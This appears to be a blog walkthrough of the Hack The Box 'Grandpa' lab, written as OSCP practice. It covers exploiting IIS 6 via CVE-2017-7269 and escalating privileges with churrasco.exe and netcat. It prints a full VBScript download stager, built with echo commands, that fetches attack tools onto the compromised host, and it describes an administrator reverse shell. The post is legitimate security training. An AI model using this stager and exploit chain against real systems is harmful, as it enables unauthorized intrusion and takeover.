Skip to content

Hack the box – Grandpa without Metasploit

After a break, back to OSCP practice boxes. Starting with grandpa. Grandpa is a windows box with 2003 server installed.

Lets start with nmap

after scanning nmap we can see that IIS v6 is installed. Did try with gobuster, nothing interesting.

did a davtest to see if it was accessible. no luck on that either.

tried searching for exploit using searchsploit. The one found didn’t work well.

after googling for sometime got a script which helped to get a limited shell.

https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269

After downloading the script, renamed it to exploit.py since it was a python script. After executing the script got a shell.

Next is privilege escalation. For privilege escalation used churrasco.exe and nc.exe. Netcat exe file comes with kali so no need to download it but for churrasco you can wget from https://github.com/Re4son/Churrasco/raw/master/churrasco.exe

after downloading the files now it’s time to transfer files to the windows box. Im gonna use a vbs script which should be familiar with the OSCP students. before that had to setup a webserver using python. python -m SimpleHTTPServer 80

For the script, can copy paste everything as it is in the command prompt.

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

This will create a file called wget.vbs. which can be used to download the rest of the files needed for privilege escalation.

All the files were downloaded using the wget.vbs file. for the privilege escalation we have to run churrasco and nc. and also have to open a new netcat listener.

we got the administrative shell.

Hope this helps.

Published inHackinghacktheboxOSCP

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *

%d bloggers like this: